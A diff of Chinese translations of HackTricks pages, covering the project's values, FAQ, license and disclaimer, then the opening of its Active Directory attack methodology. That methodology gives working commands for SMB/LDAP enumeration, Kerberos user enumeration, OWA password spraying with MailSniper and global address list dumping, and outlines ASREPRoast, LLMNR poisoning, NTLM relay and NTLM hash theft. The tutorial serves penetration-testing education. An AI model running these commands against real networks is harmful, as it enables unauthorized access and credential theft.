* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## HackTricks Values
{% hint style="success" %}
这些是**HackTricks项目的价值观**
这些是 **HackTricks 项目的价值观**
* 为**所有**互联网用户提供**免费**的**教育黑客**资源。
* 黑客是关于学习的,学习应该尽可能免费。
* 本书的目的是作为全面的**教育资源**。
* **存储**社区发布的精彩**黑客**技术,给予**原作者**所有**荣誉**。
* **我们不想要其他人的荣誉**,我们只想为每个人存储酷炫的技巧。
* 我们还在HackTricks中撰写**我们自己的研究**。
* 在几种情况下我们将在HackTricks中仅写下技术的重要部分的摘要并鼓励读者访问原始帖子以获取更多详细信息
* **组织**书中的所有黑客技术,使其**更易访问**
* HackTricks团队已经免费投入了数千小时**仅仅为了组织内容**,以便人们可以**更快学习**
* 为 **所有** 互联网用户提供 **免费** **教育黑客** 资源。
* 黑客是关于学习的,学习应该尽可能免费。
* 本书的目的是作为一个全面的 **教育资源**
* **存储** 社区发布的精彩 **黑客** 技巧,并给予 **原作者** 所有的 **荣誉**。
* **我们不想要其他人的荣誉**,我们只想为大家存储酷炫的技巧。
* 我们还在 HackTricks 中撰写 **我们自己的研究**
* 在某些情况下,我们将仅在 HackTricks 中撰写 **技术的重要部分的摘要**,并 **鼓励读者访问原始帖子** 以获取更多细节
* **组织** 书中的所有黑客技术,使其 **更易获取**
* HackTricks 团队投入了数千小时的时间,**仅仅为了组织内容**,以便人们可以 **更快学习**
{% endhint %}
<figure><img src="../.gitbook/assets/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
@ -38,33 +39,33 @@
* **非常感谢这些资源,我该如何感谢你们?**
{% endhint %}
您可以在推特上公开感谢HackTricks团队提到[**@hacktricks\_live**](https://twitter.com/hacktricks\_live)为所有人公开整理这些资源。\
如果您特别感激,还可以[**在这里赞助项目**](https://github.com/sponsors/carlospolop)。\
不要忘记**给Github项目点个星**(找到下面的链接)。
您可以在推特上公开感谢 HackTricks 团队将所有这些资源公开整理,提及 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)。\
如果您特别感激,您也可以 [**在这里赞助该项目**](https://github.com/sponsors/carlospolop)。\
并且不要忘记 **在 GitHub 项目中给个星星!**(在下面找到链接)。
{% hint style="success" %}
* **我如何为项目做贡献?**
* **我如何为项目做贡献?**
{% endhint %}
您可以与社区分享新的技巧和窍门或修复您在书籍中发现的错误通过向相应的Github页面发送**Pull Request**来做出贡献
您可以 **与社区分享新的技巧和窍门或修复您在书中发现的错误**,通过向相应的 GitHub 页面发送 **Pull Request**
* [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
* [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
不要忘记**给Github项目点个星!**
不要忘记 **在 GitHub 项目中给个星星!**
{% hint style="success" %}
* **我可以复制HackTricks的一些内容放到我的博客吗?**
* **我可以复制 HackTricks 的一些内容放到我的博客吗?**
{% endhint %}
可以,但**不要忘记提及具体的链接**内容来源
可以,但 **不要忘记提及具体的链接**,内容是从哪里获取的
{% hint style="success" %}
* **我如何引用HackTricks的某一页?**
* **我如何引用 HackTricks 的页**
{% endhint %}
只要出现您提取信息的页面的链接即可。\
如果您需要bibtex可以使用类似以下的内容
只要您引用的页面的 **链接** 出现即可。\
如果您需要 bibtex您可以使用类似的格式
```latex
@misc{hacktricks-bibtexing,
author = {"HackTricks Team" or the Authors name of the specific page/trick},
@ -74,96 +75,97 @@ url = {\url{https://book.hacktricks.xyz/specific-page}},
}
```
{% hint style="warning" %}
* **我可以在我的博客复制所有HackTricks吗**
* **我可以在我的博客复制所有HackTricks吗**
{% endhint %}
**我宁愿不这样做**。因为所有内容已经在官方HackTricks书籍中免费公开提供,这样做**对任何人都没有好处**。
**我不建议这样做**。这对**任何人都没有好处**因为所有的**内容已经在官方HackTricks书籍中免费公开**。
如果你担心内容会消失只需在Github上fork它或下载它就像我说的它已经是免费的了
如果你担心它会消失可以在Github上fork它或下载它正如我所说的它已经是免费的
{% hint style="warning" %}
* **为什么你们有赞助商HackTricks书籍是为了商业目的吗?**
* **你为什么有赞助商HackTricks书籍是商业用途吗?**
{% endhint %}
**HackTricks**的第一个**价值**是为**全世界提供免费**黑客教育资源。HackTricks团队已经**投入了数千小时**来提供这些内容,再次强调,是**免费**
第一个**HackTricks**的**价值**是为**全世界**提供**免费**黑客教育资源。HackTricks团队已经**投入了数千小时**来提供这些内容,再次强调,是**免费**。
如果你认为HackTricks书籍是为了**商业目的**而制作的,你是**完全错误**
如果你认为HackTricks书籍是为了**商业目的**而制作的,你是**完全错误**。
我们有赞助商是因为,即使所有内容都是免费的,我们希望给予社区欣赏我们的工作的可能性。因此,我们为人们提供通过[**Github赞助**](https://github.com/sponsors/carlospolop)向HackTricks捐款的选项,以及**相关的网络安全公司**赞助HackTricks并在书中**放置一些广告**,这些广告总是放在**显眼的位置**,但**不会干扰学习**过程,如果有人专注于内容
我们有赞助商,因为即使所有内容都是免费的,我们也希望**给社区提供欣赏我们工作的可能性**,如果他们愿意。因此,我们提供人们通过[**Github赞助商**](https://github.com/sponsors/carlospolop)捐赠给HackTricks的选项,以及**相关的网络安全公司**赞助HackTricks并在书中**放置一些广告**,这些**广告**总是放在不会干扰学习过程的地方,以便让人们在专注于内容时仍能看到
你不会在HackTricks中发现像其他博客那样充斥着讨厌的广告而这些博客的内容远不如HackTricks丰富因为HackTricks不是为了商业目的而制作的。
你不会发现HackTricks充满了烦人的广告就像其他内容远不如HackTricks的博客一样因为HackTricks不是为了商业目的而制作的。
{% hint style="danger" %}
* **如果某个HackTricks页面基于我的博客文章但没有引用,我该怎么办?**
* **如果某个HackTricks页面基于我的博客文章但没有引用我该怎么办**
{% endhint %}
**非常抱歉。这不应该发生**。请通过Github问题、Twitter、Discord等方式告诉我们提供包含内容的HackTricks页面链接以及你的博客链接**我们将立即检查并添加引用**。
**我们非常抱歉。这不应该发生**。请通过Github问题、Twitter、Discord等告知我们HackTricks页面的链接和你的博客链接**我们会尽快检查并添加引用**。
{% hint style="danger" %}
* **如果HackTricks中有来自我的博客的内容而我不希望它出现在那里,我该怎么办?**
* **如果我的博客内容出现在HackTricks中我不想要它在那里,我该怎么办?**
{% endhint %}
请注意在HackTricks中有指向你页面的链接
请注意在HackTricks中有链接到你的页面
* 提高你的**SEO**
* 内容被**翻译成15种以上的语言**,使更多人可以访问这些内容
* **HackTricks鼓励**人们**查看你的页面**(有几个人告诉我们因为他们的某个页面出现在HackTricks中他们收到了更多访问量
* 改善你的**SEO**
* 内容被**翻译成15种以上的语言**,使更多人能够访问这些内容
* **HackTricks鼓励**人们**查看你的页面**(有几个人提到自从他们的某个页面出现在HackTricks后他们的访问量增加了
但是如果你仍然希望从HackTricks中删除你博客的内容请告诉我们我们将**绝对删除指向你博客的每个链接**,以及任何基于它的内容。
然而如果你仍然希望从HackTricks中删除你博客的内容请告诉我们我们一定会**删除所有指向你博客的链接**,以及任何基于它的内容。
{% hint style="danger" %}
* **如果我在HackTricks中发现了复制粘贴的内容,我该怎么办?**
* **如果我在HackTricks中发现抄袭的内容,我该怎么办?**
{% endhint %}
我们始终**给予原作者所有的功劳**。如果你发现有未引用原始来源的复制粘贴内容的页面,请告诉我们,我们将**删除它****在文本之前添加链接**,或者**重写它并添加链接**。
我们始终**给予原作者所有的信用**。如果你发现某个页面有抄袭的内容而没有引用原始来源,请告诉我们,我们将**删除它**、**在文本前添加链接**,或**重写并添加链接**。
## 许可证
## LICENSE
版权所有,除非另有说明。
Copyright © 保留所有权利,除非另有说明。
#### 许可证摘要:
* 归因:您可以自由:
* 分享 — 在任何媒体或格式中复制和重新分发材料。
* 调整 — 混合、转换和构建基于该材料的作品
* 署名:你可以自由:
* 分享 — 以任何媒介或格式复制和重新分发材料。
* 改编 — 混合、转换和基于材料进行创作
#### 附加条款:
* 第三方内容:本博客/书籍的某些部分可能包含来自其他来源的内容,例如其他博客或出版物的摘录。使用此类内容是根据公平使用原则或在获得各自版权持有者的明确许可的情况下进行的。有关第三方内容的特定许可信息,请参考原始来源。
* 作者身份:由HackTricks撰写的原始内容受本许可证条款约束。在分享或调整此作品时鼓励您将此工作归因于作者。
* 第三方内容:本博客/书籍的某些部分可能包含来自其他来源的内容,例如其他博客或出版物的摘录。使用此类内容是基于合理使用原则或获得相应版权持有者的明确许可。有关第三方内容的具体许可信息,请参阅原始来源。
* 作者身份:HackTricks创作的原始内容受此许可证条款的约束。鼓励在分享或改编此作品时注明作者。
#### 例外
#### 免责条款
* 商业用途:有关商业使用此内容的查询,请与我联系。
* 商业用途:有关此内容的商业用途的询问,请与我联系。
许可证不授予与内容相关的任何商标或品牌权利。本博客/书籍中出现的所有商标和品牌都归其各自所有者所有
许可证不授予与内容相关的任何商标或品牌权利。本博客/书籍中出现的所有商标和品牌均为其各自所有者的财产
**通过访问或使用HackTricks您同意遵守本许可证的条款。如果您不同意这些条款,请不要访问本网站。**
**通过访问或使用HackTricks你同意遵守本许可证的条款。如果你不同意这些条款,请不要访问本网站。**
## **免责声明**
{% hint style="danger" %}
本书《HackTricks》仅供教育和信息目的。本书中的内容基于“原样”提供,作者和出版商对本书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性作任何明示或暗示的陈述或保证。因此,您对此类信息的任何依赖完全是自担风险的
本书《HackTricks》仅用于教育和信息目的。本书中的内容以“按现状”提供,作者和出版商不对本书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性作任何明示或暗示的陈述或保证。因此,你对这些信息的任何依赖均由你自行承担风险
作者和出版商在任何情况下均不对任何损失或损害承担责任,包括但不限于间接或后果性的损失或损害,或因使用本书而导致的任何数据或利润损失或损害。
作者和出版商在任何情况下均不对任何损失或损害负责,包括但不限于间接或后果性损失或损害,或因使用本书而导致的数据或利润损失的任何损失或损害。
此外,本书中描述的技术和提示仅供教育和信息目的,不应用于任何非法或恶意活动。作者和出版商不支持或支持任何非法或不道德的活动,任何使用本书中包含的信息都由用户自行承担风险和决定
此外,本书中描述的技术和技巧仅供教育和信息目的,不应用于任何非法或恶意活动。作者和出版商不支持或纵容任何非法或不道德的活动,使用本书中包含的信息的任何行为均由用户自行承担风险和判断
用户对基于本书中包含的信息采取的任何行动负全部责任,并在尝试实施本书中描述的任何技术或提示时,应始终寻求专业建议和帮助。
用户对基于本书中包含的信息采取的任何行动负全部责任,并应在尝试实施本书中描述的任何技术或技巧时始终寻求专业建议和帮助。
通过使用本书,用户同意免除作者和出版商对因使用本书或其中包含的任何信息而导致的任何损害、损失或伤害承担的任何和所有责任和责任。
通过使用本书,用户同意解除作者和出版商对因使用本书或其中任何信息而可能导致的任何损害、损失或伤害的责任和责任。
{% endhint %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,96 +1,96 @@
# Active Directory Methodology
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本概述
**Active Directory**作为一项基础技术,使**网络管理员**能够高效地在网络中创建和管理**域**、**用户**和**对象**。它被设计为可扩展,便于将大量用户组织成可管理的**组**和**子组**,同时在不同级上控制**访问权限**。
**Active Directory** 作为基础技术,使 **网络管理员** 能够高效地创建和管理网络中的 **域**、**用户** **对象**。它被设计为可扩展,便于将大量用户组织成可管理的 **组** **子组**,同时在不同级上控制 **访问权限**
**Active Directory**的结构由三个主要层级组成:**域**、**树**和**森林**。**域**包含一组对象,如**用户**或**设备**,共享一个数据库。**树**是由这些域组成的群组,通过共享结构连接在一起,**森林**代表多个树的集合,通过**信任关系**相互连接,形成组织结构的最高层。在每个层级上可以指定特定的**访问**和**通信权限**
**Active Directory** 的结构由三个主要层次组成:**域**、**树** 和 **森林**。一个 **域** 包含一组对象,如 **用户****设备**,共享一个公共数据库。**树** 是这些域的组,按共享结构连接,而 **森林** 代表多个树的集合,通过 **信任关系** 互联,形成组织结构的最上层。可以在每个级别指定特定的 **访问****通信权限**
**Active Directory**中的关键概念包括:
**Active Directory** 中的关键概念包括:
1. **目录** 存储有关Active Directory对象的所有信息。
2. **对象** 表示目录中的实体,包括**用户**、**组**或**共享文件夹**
3. **域** 作为目录对象的容器,多个域可以共存于一个**森林**中,每个域维护自己的对象集合。
4. **树** 共享一个公共根域的域的分组
5. **森林** Active Directory组织结构的最高层,由多个通过**信任关系**相互连接的树组成
1. **目录** 存储与 Active Directory 对象相关的所有信息。
2. **对象** 指目录中的实体,包括 **用户**、**组** 或 **共享文件夹**
3. **域** 作为目录对象的容器,多个域可以在一个 **森林** 中共存,每个域维护自己的对象集合。
4. **树** 一组共享公共根域的域。
5. **森林** Active Directory 中组织结构的顶点,由多个树组成,彼此之间有 **信任关系**
\*\*Active Directory域服务AD DS\*\*涵盖了网络中的集中管理和通信所必需的一系列服务。这些服务包括:
**Active Directory 域服务 (AD DS)** 包含一系列对网络内集中管理和通信至关重要的服务。这些服务包括:
1. **域服务** 集中存储数据并管理**用户**和**域**之间的交互,包括**认证**和**搜索**功能。
2. **证书服务** 管理安全**数字证书**的创建、分发和管理。
3. **轻量级目录服务** 通过**LDAP协议**支持启用目录的应用程序。
4. **目录联合服务** 提供**单点登录**功能以在单个会话中对多个Web应用程序的用户进行身份验证。
5. **权限管理** 通过监管未经授权的分发和使用来帮助保护版权材料。
6. **DNS服务** 对于**域名**的解析至关重要。
1. **域服务** 集中数据存储并管理 **用户****域** 之间的交互,包括 **身份验证****搜索** 功能。
2. **证书服务** 负责安全 **数字证书** 的创建、分发和管理。
3. **轻量级目录服务** 通过 **LDAP 协议** 支持目录启用的应用程序。
4. **目录联合服务** 提供 **单点登录** 功能,以在单个会话中对多个 Web 应用程序进行用户身份验证。
5. **权限管理** 通过规范其未经授权的分发和使用来帮助保护版权材料。
6. **DNS 服务** **域名** 的解析至关重要。
有关更详细的解释,请查看:[**TechTerms - Active Directory定义**](https://techterms.com/definition/active\_directory)
有关更详细的解释,请查看:[**TechTerms - Active Directory 定义**](https://techterms.com/definition/active\_directory)
### **Kerberos认证**
### **Kerberos 认证**
要学习如何**攻击AD**,您需要非常了解**Kerberos认证过程**。\
[**如果您仍不了解其工作原理,请阅读此页面。**](kerberos-authentication.md)
要学习如何 **攻击 AD**,您需要非常好地 **理解** **Kerberos 认证过程**。\
[**如果您还不知道它是如何工作的,请阅读此页面。**](kerberos-authentication.md)
## 备忘单
您可以访问[https://wadcoms.github.io/](https://wadcoms.github.io)快速查看可以运行以枚举/利用AD的命令
您可以访问 [https://wadcoms.github.io/](https://wadcoms.github.io) 快速查看可以运行的命令,以枚举/利用 AD。
## 侦察Active Directory无凭证/会话)
## 侦察 Active Directory (无凭据/会话)
如果您只能访问AD环境但没有任何凭证/会话,您可以:
如果您仅访问 AD 环境,但没有任何凭据/会话,您可以:
* **对网络进行渗透测试:**
* 扫描网络,查找机器和打开端口,尝试从中**利用漏洞**或**提取凭证**(例如,[打印机可能是非常有趣的目标](ad-information-in-printers.md))。
* 枚举DNS可能会提供关于域中关键服务器如Web、打印机、共享、VPN、媒体等的信息
* **渗透测试网络**
* 扫描网络,查找机器和开放端口,并尝试 **利用漏洞****提取凭据**(例如,[打印机可能是非常有趣的目标](ad-information-in-printers.md))。
* 枚举 DNS 可能会提供有关域中关键服务器的信息,如 Web、打印机、共享、VPN、媒体等
* `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
* 查看通用[**渗透测试方法论**](../../generic-methodologies-and-resources/pentesting-methodology.md)以获取更多关于如何执行此操作的信息。
* **检查SMB服务上的空和Guest访问权限**这在现代Windows版本上不起作用):
* 查看一般的 [**渗透测试方法论**](../../generic-methodologies-and-resources/pentesting-methodology.md),以获取有关如何执行此操作的更多信息。
* **检查 SMB 服务上的空和访客访问**(这在现代 Windows 版本上不起作用):
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
* 可以在此找到有关如何枚举SMB服务器的更详细指南
* 有关如何枚举 SMB 服务器的更详细指南,请参见
{% content-ref url="../../network-services-pentesting/pentesting-smb/" %}
[pentesting-smb](../../network-services-pentesting/pentesting-smb/)
{% endcontent-ref %}
* **枚举LDAP**
* **枚举 LDAP**
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
* 可以在此找到有关如何枚举LDAP的更详细指南特别注意匿名访问
* 有关如何枚举 LDAP 的更详细指南,请参见此处**特别注意匿名访问**
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}
* **毒网络**
* 收集凭证[**模拟使用Responder的服务**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* 通过[**滥用中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)访问主机
* 通过[**暴露带有evil-S的虚假UPnP服务**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)收集凭证
* **毒网络**
* 收集凭据 [**通过 Responder 冒充服务**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* 通过 [**滥用中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) 访问主机
* 收集凭据 **暴露** [**假 UPnP 服务与 evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
* [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology)
* 从内部文档、社交媒体、域环境内的服务主要是Web以及公开可用的地方提取公司员工的用户名/姓名
* 如果找到公司员工的完整姓名可以尝试不同的AD**用户名约定(**[**阅读此内容**](https://activedirectorypro.com/active-directory-user-naming-convention/))。最常见的约定_NameSurname_、_Name.Surname_、_NamSur_每个字母3个、_Nam.Sur_、_NSurname_、_N.Surname_、_SurnameName_、_Surname.Name_、_SurnameN_、_Surname.N_、3个\_随机字母和3个随机数字\_abc123
* 从内部文档、社交媒体、服务(主要是 Web中提取用户名/姓名,以及从公开可用的信息中提取
* 如果您找到公司员工的完整姓名,您可以尝试不同的 AD **用户名约定**[**阅读此文**](https://activedirectorypro.com/active-directory-user-naming-convention/))。最常见的约定_NameSurname_、_Name.Surname_、_NamSur_每个 3 个字母、_Nam.Sur_、_NSurname_、_N.Surname_、_SurnameName_、_Surname.Name_、_SurnameN_、_Surname.N_、3_随机字母和 3 个随机数字_abc123
* 工具:
* [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
* [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
### 用户枚举
* **匿名SMB/LDAP枚举** 查看[**渗透测试SMB**](../../network-services-pentesting/pentesting-smb/)和[**渗透测试LDAP**](../../network-services-pentesting/pentesting-ldap.md)页面。
* **Kerbrute枚举**:当请求一个**无效的用户名**时,服务器将使用\_Kerberos错误\_代码\_KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN\_进行响应从而使我们能够确定用户名无效。**有效的用户名**将在\_AS-REP\_响应中产生\_TGT\_或者产生错误\_KRB5KDC\_ERR\_PREAUTH\_REQUIRED\_表明用户需要执行预身份验证。
* **匿名 SMB/LDAP 枚举:** 查看 [**渗透测试 SMB**](../../network-services-pentesting/pentesting-smb/) 和 [**渗透测试 LDAP**](../../network-services-pentesting/pentesting-ldap.md) 页面。
* **Kerbrute 枚举**:当请求 **无效用户名** 时,服务器将使用 **Kerberos 错误** 代码 _KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN_ 响应,从而使我们能够确定用户名无效。 **有效用户名** 将引发 **AS-REP** 响应中的 **TGT** 或错误 _KRB5KDC\_ERR\_PREAUTH\_REQUIRED_指示用户需要执行预身份验证。
```bash
./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
@ -101,11 +101,9 @@ msf> use auxiliary/gather/kerberos_enumusers
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
```
* **OWA (Outlook Web Access) 服务器**
如果在网络中找到了这些服务器,您还可以对其执行**用户枚举**。例如,您可以使用工具[**MailSniper**](https://github.com/dafthack/MailSniper)
如果您在网络中发现了这些服务器,您也可以对其执行 **用户枚举**。例如,您可以使用工具 [**MailSniper**](https://github.com/dafthack/MailSniper):
```bash
ipmo C:\Tools\MailSniper\MailSniper.ps1
# Get info about the domain
@ -117,28 +115,27 @@ Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summe
# Get addresses list from the compromised mail
Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
```
{% hint style="warning" %}
您可以在[**此 GitHub 存储库**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names)和这个([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames))中找到用户名列表。
您可以在[**这个github仓库**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) \*\*\*\*和这个([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames))中找到用户名列表。
但是,您应该在执行此步骤之前进行的侦察步骤中获得了**公司员工的姓名**。有了名字和姓氏,您可以使用脚本[**namemash.py**](https://gist.github.com/superkojiman/11076951)生成潜在的有效用户名。
然而,您应该从之前执行的侦查步骤中获得**公司员工的姓名**。有了名字和姓氏,您可以使用脚本[**namemash.py**](https://gist.github.com/superkojiman/11076951)生成潜在的有效用户名。
{% endhint %}
### 知道一个或多个用户名
好的,所以您知道已经有一个有效的用户名,但没有密码... 然后尝试:
好的,您已经知道有一个有效的用户名,但没有密码……那么尝试:
* [**ASREPRoast**](asreproast.md):如果用户**没有**属性 _DONT\_REQ\_PREAUTH_您可以为该用户**请求 AS\_REP 消息**,该消息将包含由用户密码的派生加密的一些数据。
* [**密码喷洒**](password-spraying.md)尝试使用发现的每个用户的**常见密码**,也许某些用户正在使用弱密码(请记住密码策略!)。
* 请注意,您还可以**喷洒 OWA 服务器**尝试访问用户的邮件服务器。
* [**ASREPRoast**](asreproast.md):如果用户**没有**属性_DONT\_REQ\_PREAUTH_您可以**请求该用户的AS\_REP消息**,该消息将包含一些由用户密码的派生加密的数据。
* [**密码喷洒**](password-spraying.md)让我们尝试对每个发现的用户使用最**常见的密码**,也许某个用户使用了一个糟糕的密码(请记住密码策略!)。
* 请注意,您还可以**喷洒OWA服务器**以尝试访问用户的邮件服务器。
{% content-ref url="password-spraying.md" %}
[password-spraying.md](password-spraying.md)
{% endcontent-ref %}
### LLMNR/NBT-NS 毒
### LLMNR/NBT-NS
您可能能够通过**毒化**网络的一些协议来**获得**一些挑战**哈希**以破解
您可能能够**获取**一些挑战**哈希**以破解**中毒**某些网络协议
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
@ -146,21 +143,21 @@ Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password
### NTML 中继
如果您已枚举出活动目录,您将获得**更多的电子邮件和对网络的更好理解**。您可能能够强制进行 NTML [**中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)以访问 AD 环境
如果您成功枚举了活动目录,您将拥有**更多的电子邮件和对网络的更好理解**。您可能能够强制进行NTML [**中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) \*\*\*\*以获取对AD环境的访问
### 窃取 NTLM 凭
### 窃取 NTLM 凭
如果您可以使用**空用户或访客用户**访问其他计算机或共享,您可以**放置文件**(如 SCF 文件),如果某种方式访问了这些文件,将会**触发对您的 NTML 认证**,以便您可以**窃取\*\*\*\*NTLM 挑战**以破解它
如果您可以使用**空或访客用户**访问其他PC或共享您可以**放置文件**如SCF文件如果以某种方式访问将**触发对您的NTML身份验证**,以便您可以**窃取** **NTLM挑战**进行破解
{% content-ref url="../ntlm/places-to-steal-ntlm-creds.md" %}
[places-to-steal-ntlm-creds.md](../ntlm/places-to-steal-ntlm-creds.md)
